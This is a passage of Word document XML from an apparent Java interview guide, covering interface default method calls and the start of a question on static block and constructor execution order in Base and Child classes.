      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Calling Interface Default Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inside the display() method in MyClass, we use InterfaceA.super.display() and InterfaceB.super.display() to explicitly invoke the default methods from both interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49B65F" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why this Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The super keyword allows you to call methods from interfaces directly, even if there are conflicts. You must qualify which interface's method you are calling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E6085E" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBDE48" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Display from InterfaceA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB4BB7" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Display from InterfaceB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4AA55" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This way, both display() methods are invoked as per the requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025917DD" w14:textId="0DAF12EF" w:rsidR="00A4327D" w:rsidRDefault="00A4327D" w:rsidP="00F851C0">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EF52592">
          <v:rect id="_x0000_i3666" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C27C8" w14:textId="12B779C5" w:rsidR="000133E9" w:rsidRPr="00CE4B95" w:rsidRDefault="000133E9" w:rsidP="000133E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario based question - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EF7E0" w14:textId="4CDDDC47" w:rsidR="000133E9" w:rsidRPr="00CE4B95" w:rsidRDefault="000133E9" w:rsidP="000133E9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain output of below program in detail?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF4BAA" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F662CB" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7738DBC3" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Base Static"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53B5C2" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570BF4D" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167AF0F" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B3B43B" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Base Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261616D9" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38774D63" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E09E8A" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2EEA39" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//Child.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC8199" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Child</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03648BD9" w14:textId="77777777" w:rsidR="000133E9" w:rsidRPr="000133E9" w:rsidRDefault="000133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2035470"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
